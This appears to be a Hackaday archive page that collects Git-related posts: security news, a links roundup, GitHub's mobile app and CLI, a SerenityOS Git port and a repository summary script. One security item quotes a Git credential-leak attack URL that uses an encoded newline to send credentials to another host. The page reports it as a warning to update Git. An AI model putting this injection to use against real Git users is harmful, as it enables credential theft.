This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.
Continue reading “This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation”

Hackaday Links: April 5, 2020

Git is powerful, but with great power comes the ability to really bork things up. When you find yourself looking at an inscrutable error message after an ill-advised late-night commit, it can be a maximum pucker-factor moment, and keeping a clear enough head to fix the problem can be challenging. A little proactive social engineering may be in order, which is why Jonathan Bisson wrote git-undo, a simple shell script that displays the most common un-borking commands he’s likely to need. There are other ways to prompt yourself through Git emergencies, like Oh Shit, Git (or for the scatologically sensitive, Dangit Git), but git-undo has the advantage of working without an Internet connection.

Suddenly find yourself with a bunch of time on your hands and nothing to challenge your skills? Why not try to write a program in a single Tweet? The brainchild of Dominic Pajak, the BBC Micro Bot Twitter account accepts tweets and attempts to run them as BASIC programs on a BBC Microcomputer emulator, replying with the results of the program. It would seem that 280 characters would make it difficult to do anything interesting, but check out some of the results. Most are graphic displays, some animated, and with an unsurprising number of nods to 1980s pop culture. Some are truly impressive, though, like Conway’s Game of Life written by none other than Eben Upton.

The COVID-19 pandemic is causing all sorts of cultural shifts, but we didn’t expect to see much change in the culture of a community that’s been notoriously resistant to change for over a century: amateur radio. One of the most basic facts of life in the amateur radio world is that you need a license to participate, with governments regulating the process. But as a response to the pandemic, Spain has temporarily lifted licensing requirements for amateur radio operators. Normally, an unlicensed person is only allowed to operate on amateur bands under the direct supervision of a licensed amateur. The rules change allows unlicensed operators to use a station without supervision and is intended to give schoolchildren trapped at home an educational experience. In another change, some countries are allowing special callsign suffixes, like “STAYHOME,” to raise awareness during the pandemic. And the boom in interest in amateur radio since the pandemic started is remarkable; unfortunately, finding a way to take your test in a socially distant world is quite a trick. Our friend Josh Nass (KI6NAZ) has some thoughts about testing under these conditions that you might find interesting.

And finally, life goes on during all this societal disruption, and every new life deserves to be celebrated. And when Lauren Devinck made her appearance last month, her proud parents decided to send out unique birth announcement cards with a printed circuit board feature. The board is decorative, not functional, but adds a distinctive look to the card. The process of getting the boards printed was non-trivial; it turns out that free-form script won’t pass most design rule tests, and that panelizing them required making some compromises. We think the finished product is classy, but can’t help but think that a functional board would have really made a statement. Regardless, we welcome Lauren and congratulate her proud parents.

GitHub On The Go

It is hard to find anyone that does any kind of software development that doesn’t have some interaction with GitHub. Even if you don’t host your own projects there, there are so many things to study and borrow on the site, that it is nearly ubiquitous. However, when you’ve needed GitHub on the run, you’ve probably had to turn to your phone browser and had a reduced experience. GitHub for Mobile is now out of beta and promises a more fluid phone-based GitHub experience.

In addition to working with tasks and issues, you can also review and merge pull requests. The app sends your phone notifications, too, which can be handy. As you might expect, you can get the app for Android or iPhone in the respective stores.

Continue reading “GitHub On The Go”

Reaching Serenity: Porting Git To A Homebrew Operating System

Life is all about the little joys — such as waking up in the morning and realizing there’s still plenty of time before you have to actually get up. Or getting up anyway to watch a delightful sunrise as the city slowly wakes up, or as [Andreas Kling] chose, porting your favorite development tool to the operating system you wrote.

With the aesthetics of ’90s UI design and the functionality of a simpler 2000s Unix-style system core in mind, and personal reasons to keep himself busy, [Andreas] started SerenityOS a little while back. Of course, writing your own operating system is always a great educational exercise, but it takes a certain amount of commitment to push it beyond an experimental playground phase. So ideally, you’d eventually want to use it as your actual main system, however, as software developer, [Andreas] was missing one crucial component for that: git. Well, he decided to change that and just port it — and as someone who likes to record his hacking sessions, you can watch him along the way.

Admittedly, watching someone tweaking some build tools and compiler settings would normally sound anything but overly exciting, but it adds a few more layers to it when doing so for a work-in-progress OS written from scratch — from digging into libc implementations to an almost reverse engineering approach to the build environment. If you take pleasure in people’s thought process in problem solving and (spoiler alert) their success, you will enjoy watching [Andreas]. On the other hand, if you’re more curious about a fresh approach at a desktop operating system, SerenityOS itself might be worth looking into. Of course, there are other options for that as well.

Continue reading “Reaching Serenity: Porting Git To A Homebrew Operating System”

GitHub Goes GUI-less

Git is a handy tool that many of us are using for more than just software development. Having a cloud-based upstream repository is also surprisingly useful, but until now using GitHub — the most common upstream server — meant firing up a web browser, at least for certain tasks. Now GitHub is releasing a beta version of command-line tools made to manipulate your GitHub repos.

The tools are early release so they mostly focus on issues and pull requests. Of course, git itself will do the normal things like clone and checkout — you’ve always been able to do that on the command line. The example given in the announcement blog post lists all issues with a help wanted label:

gh issue list --label "help wanted"

We noticed that asking to view the issue, while done on the command line, will still open a browser. The tools are still a little early, so this is an excellent time to let the developers know what you’d like or otherwise influence the project.

We were a little surprised it wouldn’t just consume git, so that you’d use the same commands for everything and it would just pass pre-formed commands to git. Of course, that would be pretty easy to write as a shell script wrapper if you were interested in such a thing.

You’d be forgiven for only thinking of git as a way to manage source code revisions, but it’s actually capable of all sorts of interesting tricks.

This Week In Security: Backdoors In Cisco Switches, PGP Spoofing In Emails, Git Ransomware

Some switches in Cisco’s 9000 series are susceptible to a remote vulnerability, numbered CVE-2019-1804 . It’s a bit odd to call it a vulnerability, actually, because the software is operating as intended. Cisco shipped out these switches with the same private key hardcoded in software for all root SSH logins. Anyone with the key can log in as root on any of these switches.

Cisco makes a strange claim in their advisory, that this is only exploitable over IPv6. This seems very odd, as there is nothing about SSH or the key authentication process that is IPv6 specific. This suggests that there is possibly another blunder, that they accidentally left the SSH port open to the world on IPv6. Another possibility is that they are assuming that all these switches are safely behind NAT routers, and therefore inaccessible through IPv4. One of the advantages/disadvantages of IPv6 is that there is no NAT, and all the network devices are accessible from the outside network. (Accessible in the sense that a route exists. Firewalling is still possible, of course.)

It’s staggering how many devices, even high end commercial devices, are shipped with unintentional yet effective backdoors, just like this one. Continue reading “This Week In Security: Backdoors In Cisco Switches, PGP Spoofing In Emails, Git Ransomware”

Easy Git Repository Summaries With Web-git-sum

For those hosting their own git repositories there are a number of solutions for creating convenient web-accessible front ends, but [mitxela] wasn’t quite satisfied with any of them. After trying a number of alternatives and reflecting on his requirements, he realized that all he really needed was a summary page listing the latest commits, and a file tree with a list of branches and tags. To accomplish this, he created web-git-sum. It’s a bash script that runs on git’s post-receive hook and generates only two files: a summary page and an index of the repository. You can see a demo of the output at git.mitxela.com.

[mitxela]’s writeup goes into some detail on how git repositories work, how those repositories are served over HTTP, and covers a few of the different options for providing convenient and accessible web front ends. Not all repositories are alike, and what works well for one may not work or scale well for another.

Intrigued by the idea of a private git server? We covered exactly how to set one up (spoiler: it’s really easy.)